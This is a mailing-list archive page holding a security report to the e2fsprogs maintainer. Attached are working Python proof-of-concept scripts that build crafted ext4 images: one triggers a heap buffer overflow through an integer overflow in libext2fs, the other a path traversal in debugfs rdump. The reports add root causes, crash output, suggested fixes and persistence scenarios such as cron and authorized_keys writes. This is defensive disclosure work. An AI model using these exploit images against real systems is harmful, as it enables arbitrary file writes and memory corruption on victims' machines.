In-Reply-To: <20260607124935.6168-1-peng_wang@linux.alibaba.com>

On 2026/6/7 20:49, Peng Wang wrote:
> ext4_overwrite_io() decides whether a direct I/O write is an overwrite
> (all target blocks already allocated) so the write can proceed under a
> shared inode lock.  It calls ext4_map_blocks() once and returns false
> if the mapped length is shorter than the requested length.
>
> ext4_map_blocks() maps at most one extent per call.  When a write
> straddles two extents (e.g. a written extent and an adjacent unwritten
> extent created by fallocate), the single call returns only the first
> extent's length.  ext4_overwrite_io() then mis-classifies the write as
> non-overwrite and forces the caller to cycle i_rwsem from shared to
> exclusive.

For the aligned case, the overwrite check can now be skipped entirely.

For non-aligned cases, you can optimistically hold the read lock and then
use the IOMAP_DIO_OVERWRITE_ONLY flag to upgrade to a write lock if needed.



^ permalink raw reply

* security bug reporting: e2fsprogs: Path Traversal and heap overflow
From: Feng Xue @ 2026-06-07 13:34 UTC (permalink / raw)
  To: tytso@mit.edu, tytso@alum.mit.edu; +Cc: linux-ext4@vger.kernel.org


[-- Attachment #1.1: Type: text/plain, Size: 129 bytes --]

Hi there,

I'd like to report two potential security bugs for your review.
detailed report and pocs attached.

Best,
Feng

[-- Attachment #1.2: Type: text/html, Size: 1255 bytes --]

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #2: craft_inode_overflow.py --]
[-- Type: text/x-python-script; name="craft_inode_overflow.py", Size: 13481 bytes --]

#!/usr/bin/env python3
"""
Craft an ext4 filesystem image that triggers an integer overflow in
the inode_blocks_per_group calculation in lib/ext2fs/openfs.c:359-362.

Bug:
    fs->inode_blocks_per_group = ((EXT2_INODES_PER_GROUP(fs->super) *
                                   EXT2_INODE_SIZE(fs->super) +
                                   EXT2_BLOCK_SIZE(fs->super) - 1) /
                                  EXT2_BLOCK_SIZE(fs->super));

The multiplication s_inodes_per_group * s_inode_size is done in 32-bit
unsigned arithmetic. If the product exceeds 2^32, it silently wraps,
producing a small inode_blocks_per_group. This causes all inode table
boundary checks to use wrong bounds, leading to OOB access.

Strategy:
  - blocksize = 65536  (s_log_block_size = 6)
  - inode_size = 16384  (power of 2, >= 128, <= blocksize)
  - s_inodes_per_group = 0x40001 = 262145
  - product = 262145 * 16384 = 0x100004000 -> truncated to 0x4000 = 16384
  - inode_blocks_per_group = ceil(16384 / 65536) = 1  (should be 65537!)
  - Only 1 block (64K) of inode table is considered valid per group, but
    the fs claims 262145 inodes per group. Accessing any inode beyond the
    first 4 (65536/16384=4) triggers OOB reads from the inode table.
  - The inode bitmap check requires inodes_per_group/8 <= blocksize.
    262145/8 = 32768 <= 65536. Passes.

Crash chain (inode scan path):
  1. openfs.c:359: inode_blocks_per_group = 1 (should be 65537)
  2. inode.c:293: blocks_left = 1 (only 1 block of inode table is read)
  3. After 4 inodes, blocks_left = 0, but inodes_left = 262141
  4. get_next_blocks returns num_blocks=0, bytes_left=0
  5. inode.c:727-728: ptr += inode_size, bytes_left -= inode_size => -16384
  6. inode.c:659: memcpy(temp_buffer, ptr, bytes_left) with bytes_left = -16384
     => cast to size_t = huge value => heap buffer overflow

Trigger: debugfs crafted.img -R "lsdel"
         (any command that triggers ext2fs_open_inode_scan / get_next_inode)
"""

import struct
import sys
import os
import subprocess

# Superblock field offsets (from ext2_fs.h, all relative to superblock start)
OFF_INODES_COUNT       = 0x00   # __u32
OFF_BLOCKS_COUNT       = 0x04   # __u32
OFF_R_BLOCKS_COUNT     = 0x08   # __u32
OFF_FREE_BLOCKS_COUNT  = 0x0C   # __u32
OFF_FREE_INODES_COUNT  = 0x10   # __u32
OFF_FIRST_DATA_BLOCK   = 0x14   # __u32
OFF_LOG_BLOCK_SIZE     = 0x18   # __u32
OFF_LOG_CLUSTER_SIZE   = 0x1C   # __u32
OFF_BLOCKS_PER_GROUP   = 0x20   # __u32
OFF_CLUSTERS_PER_GROUP = 0x24   # __u32
OFF_INODES_PER_GROUP   = 0x28   # __u32
OFF_MAGIC              = 0x38   # __u16
OFF_STATE              = 0x3A   # __u16
OFF_REV_LEVEL          = 0x4C   # __u32
OFF_FIRST_INO          = 0x54   # __u32
OFF_INODE_SIZE         = 0x58   # __u16
OFF_FEATURE_COMPAT     = 0x5C   # __u32
OFF_FEATURE_INCOMPAT   = 0x60   # __u32
OFF_FEATURE_RO_COMPAT  = 0x64   # __u32
OFF_DESC_SIZE          = 0xFE   # __u16
OFF_LOG_GROUPS_PER_FLEX = 0x174 # __u8
OFF_CHECKSUM_TYPE      = 0x175  # __u8
OFF_BLOCKS_COUNT_HI    = 0x150  # __u32
OFF_RESERVED_GDT_BLOCKS = 0xCE # __u16

# Feature flags
EXT2_FEATURE_INCOMPAT_FILETYPE = 0x0002
EXT3_FEATURE_INCOMPAT_EXTENTS  = 0x0040
EXT4_FEATURE_INCOMPAT_64BIT    = 0x0080
EXT4_FEATURE_INCOMPAT_FLEX_BG  = 0x0200
EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER = 0x0001
EXT2_FEATURE_RO_COMPAT_LARGE_FILE   = 0x0002
EXT4_FEATURE_RO_COMPAT_HUGE_FILE    = 0x0008
EXT4_FEATURE_RO_COMPAT_GDT_CSUM     = 0x0010
EXT4_FEATURE_RO_COMPAT_DIR_NLINK    = 0x0020
EXT4_FEATURE_RO_COMPAT_EXTRA_ISIZE  = 0x0040
EXT4_FEATURE_RO_COMPAT_METADATA_CSUM = 0x0400
EXT2_FEATURE_COMPAT_EXT_ATTR   = 0x0008
EXT2_FEATURE_COMPAT_RESIZE_INODE = 0x0010
EXT2_FEATURE_COMPAT_DIR_INDEX  = 0x0020

EXT2_SUPER_MAGIC = 0xEF53
SUPERBLOCK_OFFSET = 1024


def read_u32(data, off):
    return struct.unpack_from('<I', data, off)[0]

def read_u16(data, off):
    return struct.unpack_from('<H', data, off)[0]

def write_u32(data, off, val):
    struct.pack_into('<I', data, off, val & 0xFFFFFFFF)

def write_u16(data, off, val):
    struct.pack_into('<H', data, off, val & 0xFFFF)

def write_u8(data, off, val):
    struct.pack_into('<B', data, off, val & 0xFF)


def create_crafted_image(path, size_mb=128):
    """Create a crafted ext4 image from scratch (no mke2fs dependency).

    We write the superblock, group descriptor, and minimal structures
    directly to bypass any tool-level validation.
    """
    blocksize = 65536       # 64K blocks
    log_block_size = 6      # 1024 << 6 = 65536
    inode_size = 16384      # 16K inodes
    inodes_per_group = 0x40001  # 262145

    # 1 group with 1024 blocks. Total = 1024 * 64K = 64MB
    blocks_per_group = 1024
    first_data_block = 0
    blocks_count = blocks_per_group  # 1 group
    groups_cnt = 1
    inodes_count = groups_cnt * inodes_per_group  # 262145

    # Verify the overflow
    product = (inodes_per_group * inode_size) & 0xFFFFFFFF
    inode_blocks_per_group = (product + blocksize - 1) // blocksize
    correct_ibpg = (inodes_per_group * inode_size + blocksize - 1) // blocksize

    print(f"\n=== Overflow Analysis ===")
    print(f"  blocksize         = {blocksize}")
    print(f"  inode_size        = {inode_size}")
    print(f"  inodes_per_group  = {inodes_per_group} (0x{inodes_per_group:08X})")
    print(f"  true product      = {inodes_per_group * inode_size} (0x{inodes_per_group * inode_size:X})")
    print(f"  truncated product = {product} (0x{product:08X})")
    print(f"  inode_blocks_per_group (buggy)   = {inode_blocks_per_group}")
    print(f"  inode_blocks_per_group (correct) = {correct_ibpg}")
    print(f"  groups_cnt = {groups_cnt}")
    print(f"  inodes_count = {inodes_count}")

    # Verify openfs.c checks will pass:
    # 1. s_log_block_size <= 6
    assert log_block_size <= 6

    # 2. inode_size >= 128, <= blocksize, power of 2
    assert inode_size >= 128
    assert inode_size <= blocksize
    assert (inode_size & (inode_size - 1)) == 0

    # 3. blocks_per_group >= 8
    assert blocks_per_group >= 8

    # 4. blocks_per_group <= EXT2_MAX_BLOCKS_PER_GROUP = 65528
    assert blocks_per_group <= 65528

    # 5. inode_blocks_per_group <= EXT2_MAX_INODES_PER_GROUP
    max_ipg = 65536 - (blocksize // inode_size)  # 65536 - 4 = 65532
    assert inode_blocks_per_group <= max_ipg

    # 6. EXT2_DESC_PER_BLOCK = blocksize / 32 = 2048. Non-zero.
    assert (blocksize // 32) != 0

    # 7. first_data_block < blocks_count
    assert first_data_block < blocks_count

    # 8. groups_cnt < 2^32
    assert groups_cnt < (1 << 32)

    # 9. groups_cnt * inodes_per_group == inodes_count
    assert groups_cnt * inodes_per_group == inodes_count

    # 10. Bitmap check: inodes_per_group / 8 <= blocksize
    inode_bitmap_bytes = inodes_per_group // 8
    # 262145 / 8 = 32768.125 -> integer division = 32768
    # But the check uses inodes_per_group / 8 which needs to be <= blocksize
    # Note: this is integer division in C, and 262145 is odd, so 262145/8 = 32768
    # But the bitmap needs to cover all inodes, so it should be (262145+7)/8 = 32769
    # Actually the code uses EXT2_INODES_PER_GROUP / 8 as integer division
    assert (inodes_per_group // 8) <= blocksize, \
        f"inode bitmap {inodes_per_group // 8} > blocksize {blocksize}"

    print("  All validation checks pass!")

    # Create the image
    image_size = blocks_count * blocksize
    print(f"\n  Image size = {image_size} bytes ({image_size // (1024*1024)} MB)")
    data = bytearray(image_size)

    # === Write superblock at offset 1024 ===
    sb_off = SUPERBLOCK_OFFSET

    write_u32(data, sb_off + OFF_INODES_COUNT, inodes_count)
    write_u32(data, sb_off + OFF_BLOCKS_COUNT, blocks_count)
    write_u32(data, sb_off + OFF_R_BLOCKS_COUNT, 0)
    write_u32(data, sb_off + OFF_FREE_BLOCKS_COUNT, max(0, blocks_count - 6))
    write_u32(data, sb_off + OFF_FREE_INODES_COUNT, inodes_count - 11)
    write_u32(data, sb_off + OFF_FIRST_DATA_BLOCK, first_data_block)
    write_u32(data, sb_off + OFF_LOG_BLOCK_SIZE, log_block_size)
    write_u32(data, sb_off + OFF_LOG_CLUSTER_SIZE, log_block_size)
    write_u32(data, sb_off + OFF_BLOCKS_PER_GROUP, blocks_per_group)
    write_u32(data, sb_off + OFF_CLUSTERS_PER_GROUP, blocks_per_group)
    write_u32(data, sb_off + OFF_INODES_PER_GROUP, inodes_per_group)
    write_u16(data, sb_off + OFF_MAGIC, EXT2_SUPER_MAGIC)
    write_u16(data, sb_off + OFF_STATE, 1)  # EXT2_VALID_FS
    write_u32(data, sb_off + OFF_REV_LEVEL, 1)  # EXT2_DYNAMIC_REV
    write_u32(data, sb_off + OFF_FIRST_INO, 11)
    write_u16(data, sb_off + OFF_INODE_SIZE, inode_size)
    write_u16(data, sb_off + OFF_BLOCKS_COUNT_HI, 0)

    # Feature flags: minimal. No 64bit, no metadata_csum, no journal.
    feat_compat = 0  # nothing
    feat_incompat = EXT2_FEATURE_INCOMPAT_FILETYPE
    feat_ro_compat = (EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER |
                      EXT2_FEATURE_RO_COMPAT_LARGE_FILE)

    write_u32(data, sb_off + OFF_FEATURE_COMPAT, feat_compat)
    write_u32(data, sb_off + OFF_FEATURE_INCOMPAT, feat_incompat)
    write_u32(data, sb_off + OFF_FEATURE_RO_COMPAT, feat_ro_compat)

    write_u16(data, sb_off + OFF_DESC_SIZE, 0)
    write_u8(data, sb_off + OFF_LOG_GROUPS_PER_FLEX, 0)
    write_u8(data, sb_off + OFF_CHECKSUM_TYPE, 0)
    write_u16(data, sb_off + OFF_RESERVED_GDT_BLOCKS, 0)

    # === Write Group Descriptor at block 1 ===
    # Block 0 contains the superblock (at offset 1024 within the block).
    # Block 1 is the group descriptor table.
    gdt_off = 1 * blocksize  # 65536
    # bg_block_bitmap: block 2
    # bg_inode_bitmap: block 3
    # bg_inode_table:  block 4 (only 1 block due to overflow!)
    struct.pack_into('<I', data, gdt_off + 0x00, 2)   # bg_block_bitmap
    struct.pack_into('<I', data, gdt_off + 0x04, 3)   # bg_inode_bitmap
    struct.pack_into('<I', data, gdt_off + 0x08, 4)   # bg_inode_table
    struct.pack_into('<H', data, gdt_off + 0x0C, max(0, blocks_count - 6))  # bg_free_blocks_count
    struct.pack_into('<H', data, gdt_off + 0x0E, min(inodes_count - 11, 65535))  # bg_free_inodes_count
    struct.pack_into('<H', data, gdt_off + 0x10, 2)   # bg_used_dirs_count
    struct.pack_into('<H', data, gdt_off + 0x12, 0)   # bg_flags

    # === Write a minimal root inode (inode 2) in the inode table ===
    # Inode table starts at block 4, offset = 4 * 65536 = 262144.
    # Inode 2 (root) is at index 1 (0-based), so offset = 262144 + 1 * 16384.
    # Inode 1 is special "bad blocks" inode.
    inode_table_off = 4 * blocksize
    root_inode_off = inode_table_off + 1 * inode_size  # inode 2

    # Minimal inode: directory, mode=0755
    i_mode = 0o40755  # S_IFDIR | 0755
    struct.pack_into('<H', data, root_inode_off + 0x00, i_mode)   # i_mode
    struct.pack_into('<H', data, root_inode_off + 0x02, 0)        # i_uid
    struct.pack_into('<I', data, root_inode_off + 0x04, blocksize) # i_size
    struct.pack_into('<H', data, root_inode_off + 0x1A, 2)        # i_links_count

    # Write the image
    with open(path, 'wb') as f:
        f.write(data)

    print(f"\nImage written to: {path}")
    return data


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <output_image>")
        sys.exit(1)

    output_path = sys.argv[1]

    print("Creating crafted ext4 image with inode_blocks_per_group overflow...")
    data = create_crafted_image(output_path)

    # Print superblock verification
    print(f"\nSuperblock verification:")
    sb = data[SUPERBLOCK_OFFSET:SUPERBLOCK_OFFSET+256]
    print(f"  s_inodes_count     = {struct.unpack_from('<I', sb, 0x00)[0]}")
    print(f"  s_blocks_count     = {struct.unpack_from('<I', sb, 0x04)[0]}")
    print(f"  s_first_data_block = {struct.unpack_from('<I', sb, 0x14)[0]}")
    print(f"  s_log_block_size   = {struct.unpack_from('<I', sb, 0x18)[0]}")
    print(f"  s_blocks_per_group = {struct.unpack_from('<I', sb, 0x20)[0]}")
    print(f"  s_inodes_per_group = {struct.unpack_from('<I', sb, 0x28)[0]} (0x{struct.unpack_from('<I', sb, 0x28)[0]:08X})")
    print(f"  s_magic            = 0x{struct.unpack_from('<H', sb, 0x38)[0]:04X}")
    print(f"  s_rev_level        = {struct.unpack_from('<I', sb, 0x4C)[0]}")
    print(f"  s_inode_size       = {struct.unpack_from('<H', sb, 0x58)[0]}")
    print(f"  s_feature_compat   = 0x{struct.unpack_from('<I', sb, 0x5C)[0]:08X}")
    print(f"  s_feature_incompat = 0x{struct.unpack_from('<I', sb, 0x60)[0]:08X}")
    print(f"  s_feature_ro_compat= 0x{struct.unpack_from('<I', sb, 0x64)[0]:08X}")

    # Show the overflow math
    ipg = struct.unpack_from('<I', sb, 0x28)[0]
    isz = struct.unpack_from('<H', sb, 0x58)[0]
    bsz = 1024 << struct.unpack_from('<I', sb, 0x18)[0]
    product_full = ipg * isz
    product_trunc = product_full & 0xFFFFFFFF
    ibpg_buggy = (product_trunc + bsz - 1) // bsz
    ibpg_correct = (product_full + bsz - 1) // bsz
    print(f"\n  Overflow demonstration:")
    print(f"    {ipg} * {isz} = {product_full} (0x{product_full:X})")
    print(f"    truncated to 32 bits = {product_trunc} (0x{product_trunc:X})")
    print(f"    inode_blocks_per_group (buggy)   = {ibpg_buggy}")
    print(f"    inode_blocks_per_group (correct) = {ibpg_correct}")
    print(f"    Ratio: buggy is {ibpg_correct / ibpg_buggy:.0f}x too small!")
    print(f"\n    With buggy value, only {ibpg_buggy * bsz // isz} inodes are")
    print(f"    addressable in the inode table, but the FS claims {ipg}.")
    print(f"    Any inode > {ibpg_buggy * bsz // isz} will cause an OOB read.")


if __name__ == '__main__':
    main()

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #3: craft_path_traversal.py --]
[-- Type: text/x-python-script; name="craft_path_traversal.py", Size: 5972 bytes --]

#!/usr/bin/env python3
"""
Craft an ext4 filesystem image that triggers path traversal in
debugfs rdump.

Bug: debugfs/dump.c:265
  sprintf(fullname, "%s/%s", dumproot, name);

The 'name' comes from directory entries on the crafted filesystem.
If name contains "../" components, files are written outside the
intended dump directory.

Additionally, symlink targets are read from the filesystem (line 215/226)
and created on the host (line 242), allowing arbitrary symlink creation.

Usage:
  python3 craft_path_traversal.py output.img
  debugfs output.img -R "rdump / /tmp/safe_dir"
  # Result: file created at /tmp/traversal_proof (outside safe_dir)
"""

import struct
import sys
import subprocess


def create_base_image(path, size_mb=4):
    with open(path, 'wb') as f:
        f.write(b'\x00' * size_mb * 1024 * 1024)

    subprocess.run([
        'mke2fs', '-t', 'ext4', '-F',
        '-b', '1024',
        '-N', '128',
        '-O', '^has_journal,^extents',
        path
    ], check=True, capture_output=True)


def patch_traversal(img_path):
    """Add a directory entry with ../ in the name pointing to a regular file."""
    with open(img_path, 'r+b') as f:
        # Read superblock
        f.seek(1024)
        sb = f.read(1024)
        s_log_block_size = struct.unpack_from('<I', sb, 24)[0]
        s_inode_size = struct.unpack_from('<H', sb, 88)[0]
        s_inodes_per_group = struct.unpack_from('<I', sb, 40)[0]
        block_size = 1024 << s_log_block_size

        # Read group descriptor
        gd_offset = block_size * 2 if block_size == 1024 else block_size
        f.seek(gd_offset)
        gd = f.read(64)
        inode_table_block = struct.unpack_from('<I', gd, 8)[0]
        inode_table_offset = inode_table_block * block_size

        # Use inode 12 for a regular file with content
        target_ino = 12
        target_offset = inode_table_offset + (target_ino - 1) * s_inode_size
        f.seek(target_offset)
        inode_data = bytearray(f.read(s_inode_size))

        # Set as regular file (mode 0100644)
        struct.pack_into('<H', inode_data, 0, 0o100644)
        struct.pack_into('<H', inode_data, 2, 0)  # uid

        # Content stored in i_block (inline for small files)
        content = b'TRAVERSAL_PROOF: file written outside dump directory\n'
        struct.pack_into('<I', inode_data, 4, len(content))  # i_size
        struct.pack_into('<H', inode_data, 26, 1)  # i_links_count

        # Allocate a data block for the file content
        # Use block 100 (should be free in a small fs)
        data_block = 100
        struct.pack_into('<I', inode_data, 40, data_block)  # i_block[0]
        struct.pack_into('<I', inode_data, 28, 2)  # i_blocks (in 512-byte sectors)

        f.seek(target_offset)
        f.write(inode_data)

        # Write content to the data block
        f.seek(data_block * block_size)
        f.write(content + b'\x00' * (block_size - len(content)))

        # Now add a directory entry in root with name "../../tmp/traversal_proof"
        # This will cause rdump to write outside the dump directory
        root_offset = inode_table_offset + (2 - 1) * s_inode_size
        f.seek(root_offset)
        root_inode = bytearray(f.read(s_inode_size))
        root_block = struct.unpack_from('<I', root_inode, 40)[0]

        dir_offset = root_block * block_size
        f.seek(dir_offset)
        dir_data = bytearray(f.read(block_size))

        # Find last entry and add our traversal entry
        pos = 0
        last_entry_pos = 0
        while pos < block_size:
            inode_num = struct.unpack_from('<I', dir_data, pos)[0]
            rec_len = struct.unpack_from('<H', dir_data, pos + 4)[0]
            if rec_len == 0:
                break
            if inode_num != 0:
                last_entry_pos = pos
            next_pos = pos + rec_len
            if next_pos >= block_size:
                break
            pos = next_pos

        last_rec_len = struct.unpack_from('<H', dir_data, last_entry_pos + 4)[0]
        last_name_len = dir_data[last_entry_pos + 6]
        actual_last_size = ((8 + last_name_len + 3) // 4) * 4
        remaining = last_rec_len - actual_last_size

        # Path traversal name - goes up from /tmp/out3 to /tmp/
        entry_name = b'../../tmp/traversal_proof'
        new_entry_size = ((8 + len(entry_name) + 3) // 4) * 4

        if remaining >= new_entry_size:
            struct.pack_into('<H', dir_data, last_entry_pos + 4, actual_last_size)
            new_pos = last_entry_pos + actual_last_size
            struct.pack_into('<I', dir_data, new_pos, target_ino)
            struct.pack_into('<H', dir_data, new_pos + 4, remaining)
            dir_data[new_pos + 6] = len(entry_name)
            dir_data[new_pos + 7] = 1  # file_type = regular
            dir_data[new_pos + 8:new_pos + 8 + len(entry_name)] = entry_name

            f.seek(dir_offset)
            f.write(dir_data)
            print(f"Added traversal dir entry: '{entry_name.decode()}' -> inode {target_ino}")
        else:
            print(f"Not enough space (need {new_entry_size}, have {remaining})")
            sys.exit(1)

        # Mark inode 12 as used in bitmap
        inode_bitmap_block = struct.unpack_from('<I', gd, 4)[0]
        f.seek(inode_bitmap_block * block_size)
        bitmap = bytearray(f.read(block_size))
        byte_idx = (target_ino - 1) // 8
        bit_idx = (target_ino - 1) % 8
        bitmap[byte_idx] |= (1 << bit_idx)
        f.seek(inode_bitmap_block * block_size)
        f.write(bitmap)

        print(f"Patched image with path traversal entry")
        print(f"Trigger: debugfs {img_path} -R 'rdump / /tmp/out3'")
        print(f"Expected: file created at /tmp/traversal_proof (outside /tmp/out3)")


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <output.img>")
        sys.exit(1)

    output = sys.argv[1]
    create_base_image(output)
    patch_traversal(output)


if __name__ == '__main__':
    main()

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #4: REPORT-inode-blocks-overflow.md --]
[-- Type: text/markdown; name="REPORT-inode-blocks-overflow.md", Size: 7015 bytes --]

# e2fsprogs: Integer overflow in inode_blocks_per_group causes heap buffer overflow

## Summary

A 32-bit integer overflow in `ext2fs_open2()` when computing
`inode_blocks_per_group` from untrusted superblock fields allows a
crafted filesystem image to cause a heap buffer overflow in any
libext2fs consumer that scans inodes (debugfs, dumpe2fs, fuse2fs, etc.).

## Affected Component

- File: `lib/ext2fs/openfs.c`, line 359-362
- Downstream crash: `lib/ext2fs/inode.c`, line 659
- Versions: all current versions including 1.47.4
- Affected tools: `debugfs`, `dumpe2fs`, `fuse2fs`, `e2image`, and any
  program using `ext2fs_open()` + inode scanning. Note: `e2fsck` has an
  additional `check_super_value` guard that catches this, so e2fsck is
  NOT affected.

## Severity

**High** — Heap buffer overflow (memcpy with negative/huge size) leading
to crash. Potential code execution with a carefully crafted image.

## Root Cause

In `ext2fs_open2()`, the inode table size per group is computed as:

```c
// lib/ext2fs/openfs.c:359-362
fs->inode_blocks_per_group = ((EXT2_INODES_PER_GROUP(fs->super) *
                               EXT2_INODE_SIZE(fs->super) +
                               EXT2_BLOCK_SIZE(fs->super) - 1) /
                              EXT2_BLOCK_SIZE(fs->super));
```

`EXT2_INODES_PER_GROUP` is `s_inodes_per_group` (`__u32`) and
`EXT2_INODE_SIZE` is `s_inode_size` (`__u16` promoted to `int`). Under C
integer promotion rules, the multiplication yields `unsigned int`
(32-bit), silently truncating results that exceed 2^32.

The validation at line 397 compares the already-truncated value:
```c
fs->inode_blocks_per_group > EXT2_MAX_INODES_PER_GROUP(fs->super)
```
This passes because the truncated value is small.

## Crash Chain

With `s_inodes_per_group = 262145` and `s_inode_size = 16384`:

1. **openfs.c:359**: `262145 * 16384 = 0x100004000` truncates to
   `0x4000 = 16384`. Result: `inode_blocks_per_group = 1` (should be
   65537).

2. **inode.c:293**: Inode scan sets `blocks_left = 1`, reads only 1
   block (4 inodes worth of data).

3. **inode.c:727**: After exhausting the buffer, `bytes_left -= inode_size`
   produces `bytes_left = -16384`.

4. **inode.c:659**: `memcpy(temp_buffer, ptr, bytes_left)` — `bytes_left`
   is `int`, cast to `size_t` becomes ~2^64 - 16384 → **massive heap
   buffer overflow**.

## Proof of Concept

### ASAN crash output

```
==8==ERROR: AddressSanitizer: negative-size-param: (size=-16384)
    #0 __interceptor_memcpy
    #1 memcpy /usr/include/aarch64-linux-gnu/bits/string_fortified.h:29
    #2 ext2fs_get_next_inode_full /src/lib/ext2fs/inode.c:659
    #3 ext2fs_get_next_inode /src/lib/ext2fs/inode.c:749
    #4 do_lsdel /src/debugfs/lsdel.c:182
```

### Reproduction

```bash
cd <e2fsprogs-source>
docker build -f Dockerfile.repro -t e2fsprogs-repro .
docker run --rm e2fsprogs-repro bash -c \
  'python3 /work/repro/craft_inode_overflow.py /work/t.img && \
   /src/debugfs/debugfs /work/t.img -R lsdel'
```

### PoC script

```python
#!/usr/bin/env python3
"""
Craft ext4 image that triggers inode_blocks_per_group integer overflow.

The key insight: s_inodes_per_group * s_inode_size must overflow 32 bits
while individually passing all validation checks in ext2fs_open2().

Values used:
  blocksize = 65536 (s_log_block_size = 6)
  s_inode_size = 16384 (power of 2, <= blocksize)
  s_inodes_per_group = 262145 (0x40001)
  Product: 262145 * 16384 = 0x100004000 → truncates to 0x4000
  inode_blocks_per_group = 1 (should be 65537)
"""
import struct
import sys

def main():
    path = sys.argv[1]
    
    BLOCKSIZE = 65536
    LOG_BLOCK_SIZE = 6
    INODE_SIZE = 16384
    INODES_PER_GROUP = 262145
    BLOCKS_PER_GROUP = 1024
    BLOCKS_COUNT = 1024
    FIRST_DATA_BLOCK = 0
    GROUPS_COUNT = 1
    INODES_COUNT = INODES_PER_GROUP * GROUPS_COUNT
    DESC_SIZE = 32

    img_size = BLOCKS_COUNT * BLOCKSIZE
    img = bytearray(img_size)

    # --- Superblock at offset 1024 ---
    sb_off = 1024
    struct.pack_into('<I', img, sb_off + 0, INODES_COUNT)       # s_inodes_count
    struct.pack_into('<I', img, sb_off + 4, BLOCKS_COUNT)       # s_blocks_count_lo
    struct.pack_into('<I', img, sb_off + 24, LOG_BLOCK_SIZE)    # s_log_block_size
    struct.pack_into('<I', img, sb_off + 28, LOG_BLOCK_SIZE)    # s_log_cluster_size
    struct.pack_into('<I', img, sb_off + 32, BLOCKS_PER_GROUP)  # s_blocks_per_group
    struct.pack_into('<I', img, sb_off + 36, BLOCKS_PER_GROUP)  # s_clusters_per_group
    struct.pack_into('<I', img, sb_off + 40, INODES_PER_GROUP)  # s_inodes_per_group
    struct.pack_into('<H', img, sb_off + 56, 0xEF53)            # s_magic
    struct.pack_into('<H', img, sb_off + 58, 1)                 # s_state = VALID
    struct.pack_into('<H', img, sb_off + 62, 1)                 # s_min_extra_isize
    struct.pack_into('<I', img, sb_off + 76, 1)                 # s_rev_level = DYNAMIC
    struct.pack_into('<H', img, sb_off + 88, INODE_SIZE)        # s_inode_size
    struct.pack_into('<I', img, sb_off + 96, 0x0002)            # s_feature_incompat = FILETYPE
    struct.pack_into('<I', img, sb_off + 100, 0x0003)           # s_feature_ro_compat
    struct.pack_into('<I', img, sb_off + 20, 1)                 # s_first
    struct.pack_into('<H', img, sb_off + 254, DESC_SIZE)        # s_desc_size

    # --- Group descriptor at block 1 ---
    gd_off = BLOCKSIZE
    inode_table_block = 3
    struct.pack_into('<I', gd_off + img, 0, 2)                  # bg_block_bitmap
    struct.pack_into('<I', gd_off + img, 4, 2)                  # bg_inode_bitmap
    struct.pack_into('<I', gd_off + img, 8, inode_table_block)  # bg_inode_table

    with open(path, 'wb') as f:
        f.write(img)

    product = INODES_PER_GROUP * INODE_SIZE
    truncated = product & 0xFFFFFFFF
    buggy_ibpg = (truncated + BLOCKSIZE - 1) // BLOCKSIZE
    correct_ibpg = (product + BLOCKSIZE - 1) // BLOCKSIZE

    print(f"Image: {path} ({img_size} bytes)")
    print(f"  {INODES_PER_GROUP} * {INODE_SIZE} = {product} (0x{product:X})")
    print(f"  Truncated to 32-bit: {truncated} (0x{truncated:X})")
    print(f"  inode_blocks_per_group: {buggy_ibpg} (should be {correct_ibpg})")
    print(f"Trigger: debugfs {path} -R lsdel")

if __name__ == '__main__':
    main()
```

## Suggested Fix

Use 64-bit arithmetic for the multiplication:

```c
// lib/ext2fs/openfs.c:359-362
fs->inode_blocks_per_group = (((unsigned long long)
                               EXT2_INODES_PER_GROUP(fs->super) *
                               EXT2_INODE_SIZE(fs->super) +
                               EXT2_BLOCK_SIZE(fs->super) - 1) /
                              EXT2_BLOCK_SIZE(fs->super));
```

Additionally, add a validation check after the computation:

```c
if ((__u64)EXT2_INODES_PER_GROUP(fs->super) * EXT2_INODE_SIZE(fs->super)
    > (__u64)fs->inode_blocks_per_group * EXT2_BLOCK_SIZE(fs->super)) {
    retval = EXT2_ET_CORRUPT_SUPERBLOCK;
    goto cleanup;
}
```

## Timeline

- 2026-06-07: Bug discovered during security audit

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #5: REPORT-path-traversal.md --]
[-- Type: text/markdown; name="REPORT-path-traversal.md", Size: 5700 bytes --]

# e2fsprogs: Path Traversal in debugfs rdump allows arbitrary file write

## Summary

`debugfs rdump` extracts files from an ext2/ext3/ext4 filesystem image
to a local directory. Directory entry names read from the on-disk image
are not sanitized for path traversal sequences (`../`). An attacker who
provides a crafted filesystem image can cause files to be written to
arbitrary locations outside the intended extraction directory when the
victim runs `rdump`.

## Affected Component

- File: `debugfs/dump.c`, function `rdump_inode()`, line 265
- Also affects `rdump_symlink()` at line 242 (symlink target from image
  used directly in `symlink()` syscall)
- Versions: all current versions including 1.47.4

## Severity

**High** — Arbitrary file write as the user running debugfs. If run as
root (common for filesystem recovery), this is full system compromise.

## Root Cause

In `rdump_inode()`, the output path is constructed by concatenating the
dump root with the directory entry name from the filesystem image:

```c
// debugfs/dump.c:265
sprintf(fullname, "%s/%s", dumproot, name);
```

The `name` variable comes from `rdump_dirent()` which reads it directly
from the on-disk `ext2_dir_entry.name` field (line 317):

```c
// debugfs/dump.c:316-318
thislen = ext2fs_dirent_name_len(dirent);
strncpy(name, dirent->name, thislen);
name[thislen] = 0;
```

No validation is performed to reject names containing `/`, `..`, or
absolute paths. When `name` is `../../etc/cron.d/evil`, the resulting
`fullname` resolves outside the dump directory.

Additionally, `rdump_symlink()` at line 242 creates a native symlink
whose target is read from the crafted image:

```c
// debugfs/dump.c:242
if (symlink(buf, fullname) == -1) { ... }
```

This allows the attacker to also create arbitrary symlinks on the host.

## Impact

An attacker crafts a filesystem image (e.g., on a USB drive or disk
image file) containing directory entries with `../` sequences in their
names. When a user extracts the image with `debugfs -R "rdump / <dir>"`,
the attacker's files are written outside the extraction directory.

Attack scenarios:
- Plant a `.bashrc` / `.profile` in the user's home directory
- Write to `/etc/cron.d/` for persistent code execution (if run as root)
- Overwrite `~/.ssh/authorized_keys` for SSH access
- Create malicious symlinks to redirect future operations

## Proof of Concept

### Setup

Build the Docker reproduction environment:

```bash
cd <e2fsprogs-source>
